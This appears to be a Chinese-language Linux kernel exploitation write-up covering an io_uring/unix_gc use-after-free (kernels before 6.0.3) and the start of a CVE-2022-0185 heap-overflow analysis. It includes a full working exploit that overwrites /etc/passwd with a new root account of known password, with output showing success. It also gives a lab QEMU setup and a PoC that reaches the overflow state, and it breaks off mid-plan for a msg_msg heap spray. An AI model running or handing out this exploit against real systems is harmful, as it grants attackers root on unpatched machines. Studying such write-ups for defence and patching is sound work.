  • 然后,内核递增 u->inflight 以记录该 socket 的飞行计数(表示正在被传递的数目),同时递增 user->unix_inflight 统计该用户的飞行文件数

引入飞行计数后,还是会出现不可破循环的现象:

1
2
3
4
5
(1)该进程创建socket A 和 B		  (ref=1 inflight=0, ref=1 inflight=0)
(2)将socket A 发送到 socket B (ref=2 inflight=1, ref=1 inflight=0)
(3)将socket B 发送到 socket A (ref=2 inflight=1, ref=2 inflight=1)
(4)关闭socket A (ref=1 inflight=1, ref=2 inflight=1)
(5)关闭socket B (ref=1 inflight=1, ref=1 inflight=1)
  • 当 A 和 B 的引用计数都等于每个 socket 文件描述符的飞行计数,这是可能存在垃圾的迹象

linux 垃圾处理的核心函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
/*
 * Garbage-collect AF_UNIX sockets that are only kept alive by in-flight
 * references.
 * Sockets on gc_inflight_list whose file refcount equals their inflight count
 * become candidates; candidates that still have an inflight reference after
 * the candidates' own queued references are discounted are moved to
 * not_cycle_list and later restored. The skbs queued on the remaining
 * candidates are collected on `hitlist` and purged outside unix_gc_lock.
 */
void unix_gc(void)
{
struct unix_sock *u;
struct unix_sock *next;
struct sk_buff_head hitlist;
struct list_head cursor;
LIST_HEAD(not_cycle_list);

spin_lock(&unix_gc_lock);

/* Avoid a recursive GC. */
if (gc_in_progress)
goto out;

gc_in_progress = true;
/* First, select candidates for garbage collection. Only
* in-flight sockets are considered, and from those only ones
* which don't have any external reference.
*
* Holding unix_gc_lock will protect these candidates from
* being detached, and hence from gaining an external
* reference. Since there are no possible receivers, all
* buffers currently on the candidates' queues stay there
* during the garbage collection.
*
* We also know that no new candidate can be added onto the
* receive queues. Other, non candidate sockets _can_ be
* added to queue, so we must make sure only to touch
* candidates.
*/
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
/* visit every socket on the global inflight list */
long total_refs;
long inflight_refs;

total_refs = file_count(u->sk.sk_socket->file); /* reference count of the socket's file */
inflight_refs = atomic_long_read(&u->inflight); /* inflight count of the socket */

BUG_ON(inflight_refs < 1);
BUG_ON(total_refs < inflight_refs);
if (total_refs == inflight_refs) { /* equal counts: mark the socket as a GC candidate (not freed yet) */
list_move_tail(&u->link, &gc_candidates);
__set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
}
}

/* Now remove all internal in-flight reference to children of
* the candidates.
*/
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, dec_inflight, NULL);

/* Restore the references for children of all candidates,
* which have remaining references. Do this recursively, so
* only those remain, which form cyclic references.
*
* Use a "cursor" link, to make the list traversal safe, even
* though elements might be moved about.
*/
list_add(&cursor, &gc_candidates);
while (cursor.next != &gc_candidates) {
u = list_entry(cursor.next, struct unix_sock, link);

/* Move cursor to after the current position. */
list_move(&cursor, &u->link);

if (atomic_long_read(&u->inflight) > 0) {
list_move_tail(&u->link, &not_cycle_list);
__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
scan_children(&u->sk, inc_inflight_move_tail, NULL);
}
}
list_del(&cursor);

/* Now gc_candidates contains only garbage. Restore original
* inflight counters for these as well, and remove the skbuffs
* which are creating the cycle(s).
*/
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a
* cycle. Restore these to the inflight list.
*/
while (!list_empty(&not_cycle_list)) {
u = list_entry(not_cycle_list.next, struct unix_sock, link);
__clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
list_move_tail(&u->link, &gc_inflight_list);
}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */
__skb_queue_purge(&hitlist); /* free every skb collected as garbage */

spin_lock(&unix_gc_lock);

/* All candidates should have been detached by now. */
BUG_ON(!list_empty(&gc_candidates));
gc_in_progress = false;
wake_up(&unix_gc_wait);

out:
spin_unlock(&unix_gc_lock);
}
1
2
3
4
5
6
/* Empty `list`: dequeue each skb with __skb_dequeue() and free it with kfree_skb(). */
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
struct sk_buff *skb;
while ((skb = __skb_dequeue(list)) != NULL)
kfree_skb(skb);
}
  • 垃圾收集会释放掉引用计数等于飞行计数的所有 skb,并会对 skb 中的所有 file 调用 fput

漏洞分析

影响版本:Linux Kernel < v6.0.3(v6.0.3 已修复)

漏洞效果就是在 io_uring 执行 IO 任务之前非法把文件释放掉,核心思路类似于 DirtyFile:

  • 利用另一个线程提前打开 io_uring 需要写入的文件
  • 在 io_uring 陷入阻塞的时候将该文件的 file 结构体释放掉
  • 堆喷另一个文件的 file 结构体来占位
  • 另一个线程释放 inode 锁,io_uring 拿到锁后就会写入目标文件了

如何在 io_uring 阻塞时释放其将要操作的 file 结构体,理论上来说 io_uring 始终会占用一个文件计数器,目标 file 结构体的文件计数器是不可能为 “0” 的

但在 unix_gc 释放 skb 的过程中会对 skb 中的所有 file 调用 fput,这里没有考虑 io_uring file 可能会阻塞的问题(逻辑漏洞),导致该 file 在任务阻塞完毕之前被释放,从而造成 UAF

入侵思路

漏洞的触发过程比较复杂,分析了网上很多的 wp 和 exp 后,提取出如下的关键代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
socketpair(AF_UNIX, SOCK_DGRAM, 0, s); /* 准备一对socket(s[0],s[1]),准备好之后默认的引用计数均为1 */

fd = io_uring_setup(32, params); /* 获取一个文件描述符记为fd,初始状态引用计数为1 */

rfd[0] = s[1];
rfd[1] = open("/tmp/rwA", O_RDWR | O_CREAT | O_APPEND, 0644); /* 打开一个普通可读写文件,初始状态引用计数为1 */
io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); /* 使用io_uring_register的注册功能将s[1]和rfd[1]注册到fd中 */
/*
s[1]和rfd[1]生成对应的skb保存到了fd的sk->sk_receive_queue队列中
s[1]和rfd[1]对应的file结构体都存放入skb->fp->fp中
> s[1]:引用计数2,飞行计数1
> rfd[1]:引用计数2,飞行计数0
> fd:引用计数1,飞行计数0
*/

close(rfd[1]); /* 关闭rfd[1],引用计数1 */

sendfd(s[0], fd); /* 使用s[0]将fd发送给s[1],fd引用计数2,飞行计数1 */

close(s[0]); /* 引用计数0,被释放 */
close(s[1]); /* 引用计数1,飞行计数1,暂时不会被释放 */

pthread_create(&t, NULL, slow_write, NULL);
/*
先往"/tmp/rwA"文件写入大量数据,占据inode文件锁
再向fd(io_uring)提交一个文件写(writev)的任务,往"/tmp/rwA"文件写入恶意数据(新的root账户和密码)
这个任务就会阻塞在文件权限检查之后,实际写之前
*/

io_uring_queue_exit(&ring); /* 关闭fd,fd的引用计数1(此时io_uring暂时不会被释放,可以正常工作) */

if(!fork()){ /* 创建一个socket,并且关闭,触发垃圾回收unix_gc */
close(socket(AF_UNIX, SOCK_DGRAM, 0));
exit(0);
}

int tfd = open("/etc/passwd", O_RDONLY | O_DIRECT);
for(int i =0; i < 600; i++){
open("/etc/passwd", O_RDONLY);
}

close(fd);

触发流程如下:

线程A 线程B
进行准备工作
启动线程B 打开"/tmp/rwA"文件,写入大量数据(0x80000 * 0x1000 字节)
打开"/tmp/rwA"文件,尝试写入恶意数据(新的 root 账号和密码),提交写任务到 io_uring 通过文件权限校验,并获取 inode 文件锁
通过文件权限校验,等待获取 inode 文件锁(io_uring 阻塞) 长时间写入…(持有锁)
触发垃圾回收 unix_gc(在获取 inode 文件锁之前,释放目标 file 结构体) 长时间写入…(持有锁)
打开大量"/etc/passwd"文件,堆喷占位刚刚释放的 file 结构体 释放 inode 文件锁
获得 inode 文件锁,但实际会写入"/etc/passwd"文件(因为 file 结构体被替换)
  • io_uring 会因为线程B占用 "/tmp/rwA" 文件而阻塞(等待 inode 文件锁)
  • 利用阻塞的时间来触发垃圾回收释放阻塞的 file 结构体,造成 UAF
  • 大量打开 "/etc/passwd" 文件的 file 结构体来填充 UAF
  • 最后获取 inode 文件锁时,实际上就是往 "/etc/passwd" 文件中写入数据了

完整 exp 如下:(最好使用 gcc-9 来编译,测试发现 gcc-9 的打通率要显著高于其它版本)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
#define _GNU_SOURCE

#include <assert.h>
#include <err.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <sys/wait.h>

#include <linux/userfaultfd.h>
#include <liburing.h>

/*
 * Print the string `x` in green and then restore the default colour.
 * Wrapped in do/while(0) so the macro expands to exactly one statement and is
 * safe in an unbraced if/else; the text goes through "%s" so a '%' inside it
 * is never interpreted as a format directive.
 */
#define GREEN(x) do { printf("\033[0;32m"); printf("%s", (x)); printf("\033[0m"); } while (0)
/* Reset the terminal colour attributes. */
#define RESET printf("\033[0m")

/*
 * Draw one turn of a text spinner by overprinting "[x]" using backspaces.
 * The expansion already ends in ';', so SPIN is written without a trailing
 * semicolon at the call site.
 */
#define SPIN ({ GREEN("[/]"); \
GREEN("\b\b-]"); \
GREEN("\b\b\\]"); \
GREEN("\b\b|]"); \
GREEN("\b\b-]"); \
GREEN("\b\b|]"); \
GREEN("\b\b\b");\
});

int *start_write;

/*
 * Restrict the caller (pid 0 in sched_setaffinity terms) to CPU `num`.
 * A failure is reported on stderr instead of being silently dropped; the
 * function still returns normally so callers are unaffected.
 */
void pin_cpu(int num){
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(num, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) != 0)
        perror("[!] sched_setaffinity");
}

/*
 * Thread body: issue one very large writev() to /tmp/rwA so that the write
 * stays in progress for a long time (the article uses this to keep the
 * file's inode lock held).
 *
 * Progress is published through the global *start_write: 1 right before the
 * write starts, -1 once it has finished. `arg` is unused; it exists so the
 * function has the signature pthread_create() expects.
 *
 * NOTE: the function ends with exit(0), which terminates the whole process,
 * not just this thread.
 */
void *slow_write(void *arg) {
    const unsigned long addr = 0x30000000;
    struct iovec chunks[20];
    int offset;
    int fd;

    (void)arg;
    printf("[+] Start slow write to get the lock\n");
    fd = open("/tmp/rwA", O_WRONLY);

    if (fd < 0) {
        perror("[!] error open file");
        exit(-1);
    }

    /* Build one contiguous anonymous region, page by page, at a fixed hint. */
    for (offset = 0; offset < 0x80000 / 20; offset++) {
        void *want = (void *)(addr + (unsigned long)offset * 0x1000);
        void *r = mmap(want, 0x1000, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

        /* mmap() reports failure as MAP_FAILED, and without MAP_FIXED the
         * address is only a hint: the code below assumes the region really
         * is contiguous from `addr`, so bail out if it is not. */
        if (r == MAP_FAILED || r != want) {
            printf("[!] allocate failed at 0x%x\n", offset);
            exit(-1);
        }
    }

    assert(offset > 0);
    void *mem = (void *)(addr);
    memcpy(mem, "hhhhh", 5);

    /* Every iovec points at the same region, so one call writes it 20 times. */
    for (int i = 0; i < 20; i++) {
        chunks[i].iov_base = mem;
        chunks[i].iov_len = (offset - 1) * 0x1000;
    }

    *start_write = 1;

    if (writev(fd, chunks, 20) < 0) { /* the long-running write to /tmp/rwA */
        perror("[!] slow write");
    }

    RESET;
    printf("\n[+] write done!\n");
    *start_write = -1;
    exit(0);
    return NULL; /* not reached */
}

struct iovec iov[12];

/*
 * Send the file descriptor `fd` over the AF_UNIX socket `s` as a single
 * SCM_RIGHTS control message; no payload bytes accompany it.
 *
 * Returns 0 on success and -1 if sendmsg() fails (errno is left as set by
 * sendmsg()). The original fell off the end of a non-void function.
 */
int sendfd(int s, int fd){
    /* The union gives the control buffer the alignment struct cmsghdr needs. */
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;

    memset(&msg, 0, sizeof(msg));
    memset(&ctrl, 0, sizeof(ctrl));
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));

    return sendmsg(s, &msg, 0) < 0 ? -1 : 0;
}

/* Raw io_uring_setup(2): `r` is the requested entry count, `p` points to the
 * parameter block. Returns what syscall() returns, narrowed to int. */
int io_uring_setup(int r, void *p){
    long rc = syscall(__NR_io_uring_setup, r, p);

    return (int)rc;
}

/* Raw io_uring_enter(2): all five arguments are forwarded unchanged.
 * Returns what syscall() returns, narrowed to int. */
int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig){
    long rc = syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig);

    return (int)rc;
}

/* Raw io_uring_register(2): all four arguments are forwarded unchanged.
 * Returns what syscall() returns, narrowed to int. */
int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args){
    long rc = syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);

    return (int)rc;
}

/*
 * Map the rings of the io_uring instance `fd` into `ring` and fill one SQE
 * with a WRITEV request against registered-file index 1, using the global
 * `iov` array as the I/O vector. The request is only prepared here, not
 * submitted.
 *
 * Returns 0 on success, -1 if the rings cannot be mapped or no SQE is
 * available (previously the function returned nothing and would have
 * dereferenced a NULL SQE).
 */
int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring){
    struct io_uring_sqe *sqe;
    int ret;

    ret = io_uring_queue_mmap(fd, params, ring); /* set up the ring mappings */
    if (ret < 0) {
        fprintf(stderr, "[!] io_uring_queue_mmap failed: %s\n", strerror(-ret));
        return -1;
    }

    sqe = io_uring_get_sqe(ring); /* next free submission entry */
    if (!sqe) {
        fprintf(stderr, "[!] no free SQE available\n");
        return -1;
    }

    sqe->opcode = IORING_OP_WRITEV;   /* vectored write; addr/len describe an iovec array */
    sqe->fd = 1;                      /* with IOSQE_FIXED_FILE this is an index into the registered files, not a descriptor */
    sqe->addr = (long) iov;           /* pointer to the iovec array */
    sqe->len = 1;                     /* number of iovec entries to use */
    sqe->flags = IOSQE_FIXED_FILE;    /* index 1 is the second registered file, i.e. rfd[1] ("/tmp/rwA") in main */
    return 0;
}

/*
 * Driver for the io_uring / unix_gc demonstration described in the article.
 * Statement order and the sleep() calls are part of the timing, so only the
 * comments are touched here.
 * NOTE(review): rfd[2], target_fd and tfd are never read; the return values
 * of socketpair/io_uring_setup/open/io_uring_register are not checked.
 */
int main(int argc, char **argv){
pthread_t t;
struct io_uring ring;
int fd;
struct io_uring_params *params;
int rfd[3];
int s[2];
int target_fd;
start_write = (int *)mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); /* status word shared between main and the slow_write thread */
assert(start_write != (int *)-1);

*start_write = 0;

// Password for new root user --> "lol"
iov[0].iov_base = "pwned:$1$aa$Sc4m1DBsyHWbRbwmIbGHq1:0:0:/root:/root:/bin/sh\n";
iov[0].iov_len = 59;
iov[1].iov_base = "hello, world!\n";
iov[1].iov_len = 14;
iov[2].iov_base = "hello, world!\n";
iov[2].iov_len = 14;
iov[10].iov_base = "hello, world!\n";
iov[10].iov_len = 14;
iov[11].iov_base = "hello, world!\n";
iov[11].iov_len = 14;

socketpair(AF_UNIX, SOCK_DGRAM, 0, s); /* connected pair of AF_UNIX datagram sockets (local IPC, not UDP) */

params = malloc(sizeof(*params));
memset(params, 0, sizeof(*params));
params->flags = IORING_SETUP_SQPOLL; /* ask for submission-queue polling, so new entries are picked up without an explicit io_uring_enter() */

fd = io_uring_setup(32, params); /* create the io_uring instance */
rfd[0] = s[1];
rfd[1] = open("/tmp/rwA", O_RDWR | O_CREAT | O_APPEND, 0644);

io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); /* register s[1] and /tmp/rwA as fixed files 0 and 1 of the ring */
close(rfd[1]);

sendfd(s[0], fd);
close(s[0]);
close(s[1]);
printf("[+] Creating thread\n");
pthread_create(&t, NULL, slow_write, NULL);
sleep(1);
prepare_request(fd, params, &ring);
printf("[+] Waiting for the other thread to get lock on file\n");
/* wait until slow_write signals that its big write is about to start */
while(*start_write == 0){
SPIN
}

printf("[+] Thread 1 got inode lock!\n");
printf("[+] Submitting io_uring request\n");

io_uring_submit(&ring); /* submit the prepared SQE */

sleep(2);

printf("[+] Closing io_uring\n");

io_uring_queue_exit(&ring);

if(!fork()){
printf("[+] Triggering unix_gc...\n");
close(socket(AF_UNIX, SOCK_DGRAM, 0));
printf("unix_gc done!\n");
exit(0);
}

sleep(2);
printf("[+] Opening /etc/passwd in RDONLY...\n");

int tfd = open("/etc/passwd", O_RDONLY | O_DIRECT); /* opened with O_DIRECT (per the article: bypass the page cache) */
for(int i =0; i < 600; i++){
open("/etc/passwd", O_RDONLY);
}

printf("[+] Waiting for slow_write end...\n");
/* slow_write sets the flag to -1 when its write has finished */
while(*start_write == 1){
SPIN
}
printf("\n");
sleep(5);
printf("[+] Closing fd\n");
close(fd);
printf("[+] Sleeping before exit ..\n");
sleep(20);
return 0;
}

最终效果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/ $ ./exp
[+] Creating thread
[+] Start slow write to get the lock
[+] Waiting for the other thread to get lock on file
[+] Thread 1 got inode lock!
[+] Submitting io_uring request
[+] Closing io_uring
[+] Triggering unix_gc...
unix_gc done!
[+] Opening /etc/passwd in RDONLY...
[+] Waiting for slow_write end...
[|]
[+] write done!
[|]
[|]
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:65534:65534:nobody:/home:/bin/false
pwned:$1$aa$Sc4m1DBsyHWbRbwmIbGHq1:0:0:/root:/root:/bin/sh

CVE-2022-0185

1
Linux version 5.11.16 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #2 SMP Thu Nov 30 11:43:05 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smap,smep,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

漏洞分析

在漏洞分析开始前需要先了解一下 mount 系统调用:

1
2
3
#include <sys/mount.h>

int mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data);
  • mount 系统调用被用以将文件系统挂载到以 / 为根节点的文件树上

之后有人为 mount 创建了一套更符合 “Linux 一切皆文件” 的 API:

1
2
3
#include <sys/fs.h>

/* fsopen(2) takes the filesystem type name and a flags word. */
int fsopen(const char *fs_name, unsigned int flags);
  • fsopen 系统调用则用于打开一个文件系统,并提供一个 “文件系统描述符”(被称为文件系统上下文 filesystem context)

文件系统描述符在内核中的结构体如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Filesystem context: the kernel-side object behind the descriptor returned
 * by fsopen(). `ops` supplies the per-filesystem callbacks and `fs_private`
 * points at the filesystem's own context data.
 */
struct fs_context {
const struct fs_context_operations *ops;
struct mutex uapi_mutex; /* Userspace access mutex */
struct file_system_type *fs_type;
void *fs_private; /* The filesystem's context */
void *sget_key;
struct dentry *root; /* The root and superblock */
struct user_namespace *user_ns; /* The user namespace for this mount */
struct net *net_ns; /* The network namespace for this mount */
const struct cred *cred; /* The mounter's credentials */
struct p_log log; /* Logging buffer */
const char *source; /* The source name (eg. dev path) */
void *security; /* Linux S&M options */
void *s_fs_info; /* Proposed s_fs_info */
unsigned int sb_flags; /* Proposed superblock flags (SB_*) */
unsigned int sb_flags_mask; /* Superblock flags that were changed */
unsigned int s_iflags; /* OR'd with sb->s_iflags */
unsigned int lsm_flags; /* Information flags from the fs to the LSM */
enum fs_context_purpose purpose:8;
enum fs_context_phase phase:8; /* The phase the context is in */
bool need_free:1; /* Need to call ops->free() */
bool global:1; /* Goes into &init_user_ns */
bool oldapi:1; /* Coming from mount(2) */
};
  • 核心条目就是 fs_context->fs_private

fsopen 打开一个文件系统后,可以使用 fsconfig 对该文件系统进行配置

1
2
3
#include <sys/fs.h>

/* fsconfig(2): `cmd` selects the operation (e.g. FSCONFIG_SET_STRING),
 * `key`/`value` carry the parameter and `aux` is a command-specific extra. */
int fsconfig(int fd, unsigned int cmd, const char *key, const void *value, int aux);

若我们给的 cmd 为 FSCONFIG_SET_STRING,则在内核中存在如下调用链:

1
fsconfig -> vfs_fsconfig_locked -> vfs_parse_fs_param

接着就会在 vfs_parse_fs_param 中调用 fs_context->ops->parse_param 函数指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
int ret;

if (!param->key)
return invalf(fc, "Unnamed parameter\n");

ret = vfs_parse_sb_flag(fc, param->key);
if (ret != -ENOPARAM)
return ret;

ret = security_fs_context_parse_param(fc, param);
if (ret != -ENOPARAM)
/* Param belongs to the LSM or is disallowed by the LSM; so
* don't pass to the FS.
*/
return ret;

if (fc->ops->parse_param) {
ret = fc->ops->parse_param(fc, param);
if (ret != -ENOPARAM)
return ret;
}

......

}
EXPORT_SYMBOL(vfs_parse_fs_param);

对于未设置 init_fs_context 的文件系统类型而言其最终会调用 legacy_init_fs_context 进行初始化,其中 fs_context->ops 会被设置为 legacy_fs_context_ops:(其 parse_param 指针对应为 legacy_parse_param 函数)

1
2
3
4
5
6
7
8
/*
 * Initialise a filesystem context for the legacy path: allocate a zeroed
 * struct legacy_fs_context as fc->fs_private and install
 * legacy_fs_context_ops. Returns 0, or -ENOMEM if the allocation fails.
 */
static int legacy_init_fs_context(struct fs_context *fc)
{
fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL);
if (!fc->fs_private)
return -ENOMEM;
fc->ops = &legacy_fs_context_ops;
return 0;
}

漏洞就发生在 legacy_parse_param 函数中,在 ctx 中维护一个大小为 PAGE_SIZE 的 buffer 叫做 legacy_data,作用通常是为了存储和处理数据

1
2
3
4
5
/* Per-context state used by legacy_parse_param() to accumulate mount options. */
struct legacy_fs_context {
char *legacy_data; /* option buffer (allocated with PAGE_SIZE bytes by legacy_parse_param) */
size_t data_size; /* number of bytes already stored in legacy_data */
enum legacy_fs_param param_type;
};
  • 通常来说 data_size 必须小于 PAGE_SIZE,但漏洞会导致其大于 PAGE_SIZE 发生溢出
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
/*
 * Append one "key" or "key=value" option, preceded by ',', to the legacy
 * option buffer ctx->legacy_data (allocated on first use, PAGE_SIZE bytes).
 * Returns 0 on success, -ENOMEM if the buffer cannot be allocated, or the
 * invalf() result for a rejected parameter.
 * (Excerpt: the computation of `len` is elided in the article.)
 */
static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
struct legacy_fs_context *ctx = fc->fs_private;
unsigned int size = ctx->data_size;
size_t len = 0;

......

/* size = bytes already stored, len = bytes about to be appended */
if (len > PAGE_SIZE - 2 - size) /* unsigned arithmetic: once size exceeds PAGE_SIZE - 2 the subtraction wraps around to a huge value, so this bound check can no longer fail */
return invalf(fc, "VFS: Legacy: Cumulative options too large");
if (strchr(param->key, ',') ||
(param->type == fs_value_is_string &&
memchr(param->string, ',', param->size)))
return invalf(fc, "VFS: Legacy: Option '%s' contained comma",
param->key);
if (!ctx->legacy_data) { /* first option: allocate the PAGE_SIZE buffer */
ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);
if (!ctx->legacy_data)
return -ENOMEM;
}

ctx->legacy_data[size++] = ',';
len = strlen(param->key);
memcpy(ctx->legacy_data + size, param->key, len); /* writes past the buffer when the check above was bypassed */
size += len;
if (param->type == fs_value_is_string) {
ctx->legacy_data[size++] = '=';
memcpy(ctx->legacy_data + size, param->string, param->size); /* likewise writes out of bounds after a bypassed check */
size += param->size;
}
ctx->legacy_data[size] = '\0';
ctx->data_size = size;
ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
return 0;
}
  • 如果 size + 2 的值大于 PAGE_SIZE 就会导致溢出检查失效,从而使 len 可以大于剩余未拷贝的数据长度,进而在 ctx->legacy_data 上发生溢出
  • 为了触发漏洞,size 必须大于 4094 但又不能超过 4096,因此 size 只能为 4095

漏洞 Poc 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>

#include "kernelpwn.h"

/* Raw fsopen(2) wrapper: forwards the filesystem name and flags unchanged
 * and returns the syscall() result narrowed to int. */
int fsopen(const char *fs_name, unsigned int flags){
    long rc = syscall(__NR_fsopen, fs_name, flags);

    return (int)rc;
}

/* Raw fsconfig(2) wrapper: forwards all five arguments unchanged and returns
 * the syscall() result narrowed to int. */
int fsconfig(int fsfd, unsigned int cmd,
             const char *key, const void *val, int aux){
    long rc = syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);

    return (int)rc;
}

/*
 * Proof of concept for the legacy_parse_param() bound-check bypass.
 *
 * Each ("aaaaaaa", "bbbbbbb") option is stored as ",aaaaaaa=bbbbbbb"
 * (16 bytes), so 255 of them make data_size 4080; the final
 * ",cccccccc=ddddd" (15 bytes) brings it to 4095. That is the value at which
 * the next option's length check wraps. This program only prepares that
 * state and does not send a further option.
 */
int main(int argc, char **argv, char **envp){
    int fs_fd;

    (void)argc;
    (void)argv;
    (void)envp;

    /* New user and mount namespaces before fsopen(); fail loudly instead of
     * continuing in the original namespaces. */
    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0) {
        err_exit("FAILED to unshare()!");
    }

    fs_fd = fsopen("ext4", 0);
    if (fs_fd < 0) {
        err_exit("FAILED to fsopen()!");
    }

    for (int i = 0; i < 255; i++) {
        fsconfig(fs_fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
    }
    sleep(2);
    fsconfig(fs_fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

    return 0;
}

入侵思路

出现堆溢出的 slab 是 kmalloc-4k,可以使用自写管道完成提权,但这里使用 Dirty Pipe 的方法(直接修改它的 flags)

首先我们调用 fsopen 并准备好堆溢出:

1
2
3
4
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

然后大量分配如下的 msg:

  • 一个 0x1000 的 struct msg_msg
  • 一个 0x400 的 struct msg_msgseg

那样就有机会使 legacy_data - 0x1000,msg_msg - 0x1000,msg_msgseg - 0x400 物理连续

1
2
3
|page1-------|page2----|page3-----------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgsegB][...][...]
